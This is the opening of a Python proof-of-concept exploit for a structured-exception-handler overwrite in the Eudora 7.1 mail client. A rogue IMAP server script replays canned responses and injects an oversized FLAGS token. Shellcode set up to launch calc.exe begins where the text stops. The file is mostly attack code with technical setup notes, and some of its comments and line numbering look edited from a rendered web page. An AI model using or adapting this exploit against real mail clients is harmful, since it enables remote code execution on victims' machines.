1 #!/usr/bin/python
2 # Eudora 7.1 (IMAP FLAGS) 0day Remote SEH Overwrite PoC Exploit
3 # Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
4 # Tested on Eudora 7.1.0.9 / 2k SP4 Polish
5 # Shellcode type: Windows Execute Command (calc.exe)
6 # Details:..
7 # Eudora --> SELECT INBOX ---------> IMAP server
8 # Eudora <-- FLAGS (\..AAAA...) <---- IMAP server
9 # FLAGS (\Answered \Flagged \Draft \Deleted \Seen hasatt + "A" * 1070
10 # 0x41414141 Pointer to next SEH record
11 # 0x41414141 SE handler
12 ##
13
14 from thread import start_new_thread
15 from struct import pack
16 from string import find
17 from time import sleep
18 from socket import *
19
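# Canned IMAP server responses, replayed to the connecting client in this
# order: greeting, CAPABILITY, login acknowledgement, NAMESPACE, three LIST
# replies, then the SELECT response.  The last element carries a single ``%s``
# placeholder inside the untagged FLAGS line; that is where the oversized flag
# token described in the header comment is interpolated.
#
# The quote and hyphen characters are plain ASCII (the page rendering had
# replaced them with U+2019 / U+2212, which does not parse and corrupts the
# capability names), and the backslashes in IMAP flag names are written
# escaped so the literals mean the same bytes on Python 2 and Python 3.
session_elements = (
    '* OK IMAP4 ready\r\n',

    '* CAPABILITY IMAP4 IMAP4rev1 ACL QUOTA LITERAL+ MAILBOX-REFERRALS NAMESPACE UIDP'
    'LUS ID NO_ATOMIC_RENAME UNSELECT CHILDREN MULTIAPPEND BINARY SORT THREAD=ORDERED'
    'SUBJECT THREAD=REFERENCES ANNOTATEMORE IDLE SASL-IR\r\n'
    '00000 OK completed\r\n',

    '00001 OK User logged in\r\n',

    '* NAMESPACE (("INBOX." ".")) (("user." ".")) (("" "."))\r\n'
    '00002 OK Completed\r\n',

    '* LIST (\\Noselect) "." ""\r\n'
    '00003 OK Completed (0.000 secs 0 calls)\r\n',

    '* LIST (\\HasChildren) "." "INBOX"\r\n'
    '00004 OK Completed (0.000 secs 3 calls)\r\n',

    '* LIST (\\HasChildren) "." "INBOX"\r\n'
    '00005 OK Completed (0.000 secs 3 calls)\r\n',

    # SELECT response; the %s is the only formatting slot in the whole tuple.
    '* FLAGS (\\Answered \\Flagged \\Draft \\Deleted \\Seen hasatt%s)\r\n'
    '* OK [PERMANENTFLAGS (\\Answered \\Flagged \\Draft \\Deleted \\Seen hasatt \\*)]\r\n'
    '* 1 EXISTS\r\n'
    '* 0 RECENT\r\n'
    '* OK [UIDVALIDITY 1180222864]\r\n'
    '* OK [UIDNEXT 2]\r\n'
    '* OK [NOMODSEQ] Sorry, modsequences have not been enabled on this mailbox\r\n'
    '* OK [URLMECH INTERNAL]\r\n'
    '00003 OK [READ-WRITE] Completed\r\n',
)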
51
52 shellcode = (
53 # Restricted Characters: 0x0a, 0x0d, 0x20, 0x29, (0x60 .. 0x7B)
54 # EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaN